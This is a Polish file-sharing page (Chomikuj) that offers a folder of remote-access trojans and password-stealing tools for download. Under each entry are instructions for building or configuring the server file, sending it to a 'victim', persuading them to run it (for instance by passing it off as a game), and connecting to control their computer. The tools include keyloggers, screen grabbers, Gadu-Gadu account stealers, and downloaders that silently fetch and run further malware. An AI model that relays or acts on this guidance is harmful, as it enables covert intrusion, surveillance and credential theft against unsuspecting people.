3. Potem odpalamy plik o nazwie client.exe, za jego pomocą połączymy się z komputerem ofiary i będziemy mogli wydawać zdalne polecenia. Uruchamia się program widziany na screenshocie w którym musimy podać adres IP ofiary i port o i kliknąć na connect.

zachomikowany

  • 1,8 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy plik Plik jest skompresowany, więc musimy go zdekompresować. Wchodzimy do zdekompresowanego folderu i widzimy dwa pliki:
-acessor.exe (jest to plik client)
-aserver.exe (jest to plik serwer)
2. Plik aserver.exe wysyłamy do naszej ofiary.
3. My zaś otwieramy plik acessor.exe. Uruchomi się program widziany na screenshocie. Za jego pomocą połączymy się z zainfekowanym komputerem. Podajemy HOST ofiary (który bez problemu ustalimy za pomocą jej adresu IP ) i klikamy na opcję Conectar (czyli połącz). To wszystko :)

zachomikowany

  • 1,3 MB
  • 15 lis 11 18:27
Obsługa programu:
1. AHS (Assembler HTTP Server by Czajnick) - jest to trojan, który pozwala kontrolować zainfekowany komputer za pośrednictwem protokołu HTTP oraz zwykłej przeglądarki internetowej (np. Internet Explorer, Netscape Navigator, Opera). Zawiera wszystkie najpotrzebniejsze funkcje takie jak: dostęp do plików na dyskach, keylogger, generator komunikatów, menedżer okien oraz sporo różnego rodzaju "bajerów".
2. Ściągamy skompresowany plik o nazwie Ahs 1.zip
3. Dekompresujemy ten plik i wchodzimy do folderu. Z całego wypakowanego folderu nas interesuje głównie tylko jeden plik: winhttp.exe
4. Właśnie ten plik (czyli winhttp.exe) wysyłamy do naszej ofiary. Wiadomo że nie wolno go otwierać u siebie, bo trojan odpalił by się u nas :(
Nasza ofiara musi uruchomić ten plik na swoim kompie
5. My zaś otwiearmy plik client, którym jest zwykła przeglądarka internetowa i dlatego nie robiłem screena, bo każdy wie jak wygląda ;]
W adresie przeglądarki wpisujesz:

http://ip_lamera:34280/`ahs

(`to klawisz znajdujący się pod Esc)
6. Pojawia się interfejs trojana - chyba że coś zjebałeś. Teraz już wiesz co robić.

Jak wywalić AHS?
Jeżeli przypadkowo odpaliłeś plik winhttp.exe i chcesz wywalić trojana z systemu:
- wpisujesz w przegladarce adres http://localhost:34280/`ahs
- klikasz 'Wylacz AHS'
- uruchamiasz edytor rejestru (regedit.exe)
- idziesz do HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
- usuwasz wartość Windows HTTP SubSystem
- C:\WINDOWS\System32\winhttp.exe usuwasz ten plik

Co robić z plikami *.A36 oraz `zdj?
A36 jest to format kompresji oparty na ApLibie 0.36 by Joergen Ibsen / Jibz.
AHS pakuje na niego np. screeny ekranu. Takiego zapakowanego screena ty możesz ściągnąć z komputera ofiary jako plik o nazwie `zdj. Należy go rozpakować używając załączonego programu un_a36, pisząc po prostu w linii poleceń:
un_a36 `zdj
lub
un_a36 plik.a36
Otrzymasz rozpakowana wersje pliku 'zdj, która jest zwykłym BMP-kiem i zajmuje zwykle kilka megabajtów. Teraz ten plik 'zdj możesz sobie otworzyć np. pod Paintem :)

zachomikowany

  • 1,3 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy plik Plik jest skompresowany, więc musimy go zdekompresować. Wchodzimy do zdekompresowanego folderu i widzimy dwa pliki:
-client.exe
-server.exe
2. Plik server.exe wysyłamy do naszej ofiary.
3. Otwieramy plik client.exe. Uruchomi się program widziany na screenie. Za jego pomocą połączymy się z zainfekowanym komputerem.

zachomikowany

  • 3,2 MB
  • 15 lis 11 18:27
<a>
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie Amitis v.1.zip
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
Amistis1.3.exe, Comperessor deccompressor.exe, Edit serwer.exe , Serwer.exe, Simulated serwer.exe
3. Najpierw otwierasz u siebie plik "Edit serwer.exe" Służy on do odpowiedniego skonfigurowania trojana. Potem zapisujesz ustawienia.
4. Wysyłasz do ofiary plik "Serwer.exe". Ona go musi u siebie odpalić.
5. Ty zaś otwierasz plik Amistis1.3.exe. Uruchamia się program widziny na screenie. Podajesz adres IP ofiary i łączysz się z zainfekowanym komputerem.
<a>

zachomikowany

  • 2,3 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie Beast v2.07 06-08-2004.zip
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik:
Beast2.07.exe
3. Odpalamy u siebie plik Beast2.07.exe. Uruchamia się program widziany na screenie:

4. Teraz musisz stworzyć plik serwer, który podrzucisz ofiarze.
Klikasz na opcję "Build serwer" (zaznaczyłem tę opcje powyżej kolorem czerwonym)
5. Kiedy klikniesz na opcję "Build serwer" uruchomi się program widziany na screenie:

Jak już odpowiednio skonfigurujesz trojana to klikasz na opcje "Save serwer"
6. Powstaje trojan który musisz podrzucić ofiarze. Ona go musi otworzyć.
Ty zaś musisz otworzyć plik Beast2.07.exe Teraz podajesz Host ofiary i łączysz się zdalnie z zainfekowanym komputerem.

zachomikowany

  • 1,9 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy plik Hack A Tack v.1.20 new.zip
2. Dekompresujemy ten plik i wchodzimy do tego folderu.
3. Widzimy pliki o nazwach:
Hack'a Track Clinet 1.20.exe, Serwer.exe
4. Plik serwer wysyłamy do naszej ofiary. My zaś odpalamy plik
Hack'a Track Clinet 1.20.exe. Uruchamia się program widziany na screenie, w którym musimy podać IP ofiary i kliknąć na connect.

zachomikowany

  • 2,0 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy plik Plik jest skompresowany, więc musimy go zdekompresować. Wchodzimy do zdekompresowanego folderu i widzimy pliki: client.exe, serwer.exe
2. Plik serwer wysyłamy do naszej ofiary. My zaś otwieramy plik client. Uruchomi się program widziany na screenshocie, w którym podajemy adres IP ofiary i klikamy na connect.

zachomikowany

  • 1,9 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie A New Trojan.zip
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
client.exe, syst.exe
3. Plik o nazwie syst.exe (czyli serwer) wysyłasz do swojej ofiary.
4. Teraz otwierasz plik o nazwie client.exe. Uruchamia się program widziany na screenie, w którym klikasz na zakładkę "Połączenie" i tam podajesz adres IP swojej ofiary.

zachomikowany

  • 2,2 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie Angel 1.zip
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
Angel 1.2.exe, bezpieczny serwer.exe, Serwer.exe
3. Plik Serwer.exe wysyłamy do naszej ofiary. Tego pliku nie wolno otwierać, bo by się trojan zagnieździł w naszym systemie, a tego byśmy przecież nie chcieli :)
4. Następnie odpalamy u siebie plik Angel 1.2.exe. Uruchamia się program widziany na screenie w którym musimy podać adres IP naszej ofiary i kliknąć na Połącz.

Gdybyś chciał przetestować tego trojana na własnym kompie to:
1. Otwierasz plik bezpieczny serwer.exe (działa on na tej zasadzie że trojan się uruchomi na twoim kompie tylko nie doda się do auto startu i rejestru, więc dlatego jest nazwany bezpiecznym :)
2. Na razie nie zamykasz tego programu, tylko otwierasz plik Angel 1.2.exe w którym podajesz swój adres IP i klikasz na połącz.
3. Gotowe. Teraz możesz wykonywać komendy za pomocą pliku client (czyli Angel 1.2.exe) na własnym kompie.
PS: Oczywiście plik bezpieczny serwer.exe służy tylko i wyłącznie do testowania trojana na własnym kompie. Do swojej ofiary musisz wysłać plik serwer.exe

zachomikowany

  • 1,5 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie BackOrifice.zip
2. Dekompresujemy ten plik i wchodzimy do folderu.
Z całego zdekompresowanego folderu nas interesują w szczególności dwa pliki:
BOGUI.EXE, BOSERVE.EXE
3. Plik o nazwie BOSERVE.EXE wysyłamy do naszej ofiary.
4. My zaś z kolei odpalamy u siebie plik BOGUI.EXE (czyli cleint)
Uruchamia się program widziany na screenie, w którym podajemy Host ofiary i wykonujemy zdalne polecenia na jej komputerze.

zachomikowany

  • 2,1 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Trojan jedynie z opcja przeglądania dysku. Na protokole FTP.
2. Ściągamy skompresowany plik o nazwie FTPHDD.zip
3. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik:
FTP2HDD.exe.
4. Odpalamy plik FTP2HDD.exe. Uruchamia się program widziany na screenie:

5. Klikamy na opcję "Generuj serwer" Powstaje plik, który musimy wysłać do naszej ofiary. Ofiara musi go otworzyć.
6. Teraz klikasz na opcję "Używanie". Tam jest dalsza część instrukcji obsługi. Chyba wszystko jasne: ;]

zachomikowany

  • 1,6 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Trojan służący do kradzieży haseł GG, a co za tym idzie konta GG.
2. Ściągamy skompresowany plik o nazwie Gadu wireader 1.zip
3. Dekompresujemy ten plik i wchodzimy do folderu.
3. Odpalamy u siebie plik gadu_wireader1.4.exe, czyli plik client. Otwiera się program widziany na screenie:

4. Uzupełniany wszystkie okienka swoimi danymi i klikamy na opcję utwórz trojana.
5. Następnie utworzony plik (czyli trojan) wysyłamy do naszej ofiary.

zachomikowany

  • 1,7 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Zakładamy numer Gadu-Gadu.
Aby założyć numer GG, musimy uruchomić komunikator Gadu-Gadu, a następnie, z menu wybrać Użytkownik -> Nowy.
Po założeniu numeru, zapisz sobie nowy numer, oraz hasło do niego.
2. Ściągamy skompresowany plik o nazwie AdminGG.zip
Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik: AdminGG.exe
3. Uruchamiamy program Admin GG. Uruchamia się program widziany na screenie:



W polu oznaczonym jako "numer gg" wpisujemy numer Gadu-Gadu, który wcześniej założyliśmy (patrz punkt 1), a w polu "hasło gg" hasło do tego numeru. Następnie klikamy na przycisk "Kompiluj", oraz wskazujemy miejsce gdzie ma zostać zapisany skonfigurowany przed chwilą plik.
4. Plik, który przed chwilą skonfigurowałeś uruchamiasz na komputerze, którym chcesz sterować. Np. Jeśli zamierzasz sterować komputerem kolegi, wysyłasz mu ten plik np. na emaila lub dajesz na dyskietce. Żeby program działał, kolega musi uruchomić ten plik na swoim komputerze. Następnie do swojej listy kontaktów, dodajesz numer, który założyłeś (punkt 1) i który posłużył ci do konfiguracji pliku, który wysłałeś do kolegi.
Jeśli kolega uruchomił plik na swoim komputerze, numer który dodałeś do listy będzie miał status "Dostępny", w czasie gdy kolega będzie miał włączony komputer.
Plik uruchomiony na komputerze kolegi, będzie się automatycznie włączał przy starcie systemu Windows.
Uwaga! Nie możesz dać kilku osobom jednego, tego samego skonfigurowanego pliku! Dzieje się tak, ponieważ plik używa numeru Gadu-Gadu, który podałeś przy konfiguracji pliku. Jeden skonfigurowany plik może działać tylko na jednym komputerze. Gdy chcemy wysłać plik kilku osobom, należy dla każdej z nich skonfigurować osobny plik, każdy z nowym numerem Gadu-Gadu.
5. Jeśli wykonałeś poprawnie wszystkie instrukcje zawarte w punktach
1, 2, 3, 4 możesz rozpocząć sterowanie komputerem osoby, która uruchomiła skonfigurowany plik, np. kolega. Sterowanie odbywa się przez wysyłanie odpowiednich komend, na numer, który zapisałeś na liście kontaktów zgodnie z punktem czwartym.

Lista komend:
opencd - wysuwa tackę CD-ROM
closecd - wsuwa tackę CD-ROM
spo - wyłącza monitor
turnscr - odwraca obraz na monitorze "do góry nogami"
pulpithide - ukrywa ikony na pulpicie, tym samym go blokując
pulpitshow - pokazuje ikony na pulpicie
timehide - ukrywa zegarek systemowy
timeshow - pokazuje zegarek systemowy
shutdown - wyłącza komputer
open "adres_strony" - uruchamia dowolną stronę internetową w domyślnej przeglądarce,
zamiast "adres_strony" wpisujemy adres dowolnej strony WWW (bez "") np "open www.google.pl"
msg "tresc_komunikatu" - pokazuje komunikat o dowolnej treści np. "msg Mam cię!"
help - pokazuje spis komend.
6. Komendy można wysyłać na odpowiedni numer jedynie wtedy, gdy jest on Dostępny na liście kontaktów.
7. Jeśli to wszystko przeczytałeś to brawo :)

zachomikowany

  • 1,9 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie KacoZONE 1.zip
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik:
KacoZONE_Konfigurator.exe
3. Odpalamy właśnie ten plik (czyli "KacoZONE_Konfigurator.exe")
Uruchamia się program widziany na screenie:
<a>
4. Teraz musisz uzupełnić wszystkie okienka i kliknąć na Generuj.
Jeśli masz problemy kliknij na opcję Help (tam jest wszystko napisane).
5. Plik który wygenerowałeś (trojana) wysyłasz do swojej ofiary. KONIEC ;]

zachomikowany

  • 4,1 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie Katiusz 2.zip
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik:
katiusz2.1.exe
3. Plik o nazwie katiusz2.1.exe odpalamy u siebie. Uruchamia się program widziany na screenie:

4. Teraz musisz stworzyć trojana (plik serwer), który podrzucisz do swojej ofiary. Aby to zrobić klikasz na zakładkę "Konfiguracja". Teraz uzupełnisz wszystkie ramki i klikasz na Generuj. Powstaje trojan :)
5. Teraz wysyłasz go do ofiary. Ofiara musi go otworzyć.

zachomikowany

  • 1,5 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Program dostarcza i uruchamia niebezpieczne aplikacje na komie ofiary.
Jest to trojan typu downloader, czyli taki w którym kiedy ofiara otworzy u siebie trojana, którego jej wysłaliśmy to ten ściągnie na jej dysk wskazany przez nas syf np. wirusy, robaki czy inne trojany.
2. Ściągamy skompresowany plik o nazwie Kurier v.1.zip
3. Dekompresujemy ten plik i wchodzimy do folderu.
4. Otwieramy u siebie plik o nazwie kurier v1.0 Za jego pomocą stworzymy naszego trojana. Uruchamia się program widziany na screenie.

5. Uzupełniasz wszystkie trzy okienka i klikasz na Generuj.
Powstaje plik trojan, mający rozmiar około 40KB, którego nie wolno otwierać bo syf zrobiłby się u nas, a tego byśmy przecież nie chcieli :]
6. Teraz ten plik (trojana) którego stworzyłeś wysyłasz do swojej ofiary.
7. Jeżeli ofiara uruchomi naszego "kuriera", wyświetli się jej okno błędu np. "Plik uszkodzony!", program automatycznie pobierze z Internetu (z podanego mu linku) niebezpieczną aplikację i ją uruchomi bez wiedzy ofiary.

zachomikowany

  • 1,7 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie LaDe.zip
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
LaDe 1.3.exe, serwerek.exe
3. Plik o nazwie serwerek.exe musimy podrzucić naszej ofiarze.
4. My zaś otwieramy plik o nazwie LaDe 1.3.exe (czyli clienta). Uruchamia się program widziany na screenie, w którym musimy podać adres IP naszej ofiary i kliknąć na Połącz.

zachomikowany

  • 2,3 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Jest to trojan pobierający z Internetu inne szkodliwe programy bez wiedzy i zgody użytkownika zainfekowanego komputera. Trojan powstał przy użyciu środowiska programistycznego MASM32 i wygenerowany plik servera zawiera około ~850 bajtów.
2. Ściągamy skompresowany plik o nazwie Mo4x Downloader 0.zip
3. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:

4. Z całego rozpakowanego folderu nas interesuje tylko jeden plik:
GENERATOR.exe Zaznaczony na powyższym screenie czerwonym kółkiem.
5. Uruchamiamy ten plik u siebie (czyli GENERATOR.exe)
Uruchomi się program w którym musimy podać link, do miejsca w którym umieściliśmy szkodliwe oprogramowanie. Następnie klikamy na Generuj.
5. W folderze powstaje nowy plik (trojan), którego nie wolno otwierać. Wysyłamy go do naszej ofiary. Kiedy ofiara go otworzy trojan ściągnie i odpali wskazany przez na program ;]
PS: Sorry że nie dałem screena z programu Generator.exe ale nie mogłem go w żaden sposób wykonać :(

zachomikowany

  • 1,8 MB
  • 15 lis 11 18:27
Starsza wersja trojana

Obsługa programu Ninja trojan 1.0:
1. Ściągamy skompresowany plik o nazwie Ninja trojan 1.0.zip
2. Dekompresujemy ten plik i wchodzimy do folderu.
Widzimy 2 foldery: client, serwer
3. Wchodzimy do folderu serwer i wysyłamy naszej ofiarze plik o nazwie NN.exe. Ofiara musi go odpalić na swoim kompie.
3. Wchodzimy do folderu client i otwieramy na swoim kompie plik o nazwie NN 1.0.exe Uruchamia się program w którym podajemy adres IP naszej ofiary i klikamy na Połącz. Sorry że nie dałem screena pliku client ale niestety nie mogłem go w żaden sposób wykonać :( Próbowałem różnymi programami do robienia sceenshotów :(

Gdybyś chciał przetestować tego trojana na własnym kompie to:
1. Otwierasz plik bezpieczny serwer.exe (działa on na tej zasadzie że trojan się uruchomi na twoim kompie tylko nie doda się do auto startu i rejestru, więc dlatego jest nazwany bezpiecznym :)
2. Na razie nie zamykasz tego programu, tylko otwierasz plik który znajduje się w folderze client. W nim wklepujesz swój adres IP i klikasz na połącz.
3. Gotowe. Teraz możesz wykonywać komendy za pomocą pliku client na własnym kompie.

zachomikowany

  • 2,0 MB
  • 15 lis 11 18:27
Nowsza wersja trojana

Obsługa programu Ninja trojan 1.2:
1. Ściągamy skompresowany plik o nazwie Ninja trojan 1.0.zip
2. Dekompresujemy ten plik i wchodzimy do folderu.
Widzimy 2 foldery: client, serwer
3. Wchodzimy do folderu serwer i wysyłamy naszej ofiarze plik o nazwie NN.exe. Ofiara musi go odpalić na swoim kompie.
3. Wchodzimy do folderu client i otwieramy na swoim kompie plik o nazwie NN 1.0.exe Uruchamia się program w którym podajemy adres IP naszej ofiary i klikamy na Połącz. Sorry że nie dałem screena pliku client ale niestety nie mogłem go w żaden sposób wykonać :( Próbowałem różnymi programami do robienia sceenshotów :(

Gdybyś chciał przetestować tego trojana na własnym kompie to:
1. Otwierasz plik bezpieczny serwer.exe (działa on na tej zasadzie że trojan się uruchomi na twoim kompie tylko nie doda się do auto startu i rejestru, więc dlatego jest nazwany bezpiecznym :)
2. Na razie nie zamykasz tego programu, tylko otwierasz plik który znajduje się w folderze client. W nim wklepujesz swój adres IP i klikasz na połącz.
3. Gotowe. Teraz możesz wykonywać komendy za pomocą pliku client na własnym kompie.

PS:: Na marginesie dodam że w nowszej wersji trojana (czyli Ninja trojan 1.2) jest dodana "zmiana ikon", ładniejszy interfejs, no i kilka nowych opcji. Ale w nowszej wersji brak niektórych opcji które były w starszej :)

zachomikowany

  • 2,9 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie Świnia 1.zip
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy kilka folderów:
ADMINISTRATOR - program w tym folderze służy do podłączania się do komputera, który zawiera "Świnię". Należy wpisać Nazwę komputera lub adres IP i kliknąć polącz, a potem można się nieźle zabawić.
ŚWINIA - program w tym folderze trzeba wgrać komuś w sieci lokalnej na komputer ( możesz komuś np. wmówić że to fajna gra :) ). Świnię jest trudno usunąć z komputera ponieważ nie da się tej aplikacji zamknąć kombinacją klawiszy CTRl-ALT-DEL, przywracaniem systemu też się nie da usunąć, jedynie to Deinstalką.
DEINSTALATOR - program w tym folderze usuwa świnię z kompa.
3. Musisz wysłać ofiarze plik bnupdate.exe (plik ten znajduje się w folderze Świnia, jest to plik serwer).
4. Ty zaś otwierasz plik Administrator.exe, który znajduje się w folderze o tej samej nazwie czyli Administrator. Uruchamia się program widziany na screenie w którym podajesz adres IP ofiary lub nazwę jego kompa (co wolisz) i klikasz na Połącz.

zachomikowany

  • Pobierz folder
  • Aby móc przechomikować folder musisz być zalogowanyZachomikuj folder
  • dokumenty
    0
  • obrazy
    0
  • pliki wideo
    0
  • pliki muzyczne
    0

73 plików
151,96 MB




yehicih814

yehicih814 napisano 25.03.2022 22:43

zgłoś do usunięcia
Super chomik
patryktarachon

patryktarachon napisano 8.04.2022 22:41

zgłoś do usunięcia
Książka Zdobywcy Serc
WIESIEUKA

WIESIEUKA napisano 29.07.2022 17:24

zgłoś do usunięcia
ZZAAPPRRAASZAAMM ;-}
jasiu2604

jasiu2604 napisano 28.11.2022 01:29

zgłoś do usunięcia
ZAPRASZAM
xejowoy183

xejowoy183 napisano 11.02.2023 06:05

zgłoś do usunięcia
Super chomik
ilove69

ilove69 napisano 21.03.2023 11:29

zgłoś do usunięcia
u mnie działa, długo muliło, ale zainstalowało.
M.K-16

M.K-16 napisano 14.04.2023 16:07

zgłoś do usunięcia
Witam , pozdrawiam i zapraszam do siebie. 🔐UnicornVIP🔐
xinose8671

xinose8671 napisano 13.05.2023 14:40

zgłoś do usunięcia
Zapraszam
wlo12345

wlo12345 napisano 1.11.2023 09:35

zgłoś do usunięcia
KevinPL4416

KevinPL4416 napisano 26.12.2024 13:16

zgłoś do usunięcia
Zapraszam

Musisz się zalogować by móc dodawać nowe wiadomości do tego Chomika.

Zgłoś jeśli naruszono regulamin
W ramach Chomikuj.pl stosujemy pliki cookies by umożliwić Ci wygodne korzystanie z serwisu. Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, będą one umieszczane na Twoim komputerze. W każdej chwili możesz zmienić swoje ustawienia. Dowiedz się więcej w naszej Polityce Prywatności